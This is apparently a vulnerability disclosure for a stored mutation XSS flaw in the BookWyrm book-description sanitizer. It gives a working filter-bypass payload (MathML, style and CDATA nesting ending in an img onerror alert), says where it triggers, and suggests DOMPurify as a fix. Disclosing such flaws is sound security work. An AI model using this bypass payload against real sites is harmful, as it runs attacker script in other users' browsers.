Description

bookwyrm HTML input sanitizer is vulnerable to Mutation XSS. The payload could be stored and displayed on the homepage of the website (path /#feed or /#discovery) making it widely affects all users and the main website.

Proof of Concept

Edit a book description:

// PoC
&lt;math&gt;&lt;mtext&gt;<table>&lt;mglyph&gt;&lt;style&gt;&lt;![CDATA &gt;<img src>&lt;/style&gt;<img title="]]&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert('Pwned')&gt;">

Access to the /#feed (homepage of logged-in user) or /#discovery (which contains the book payload) will trigger the malicious code and pop up a Pwned alert.

Link video PoC Mutation XSS

Suggestion

The vulnerable base on the weakness of HTMLParserthat it is not guaranteed to successfully parse all kinds of string input. You could find another replacement sanitizer, such as DOMPurify to achieve more accuracy and still support HTML.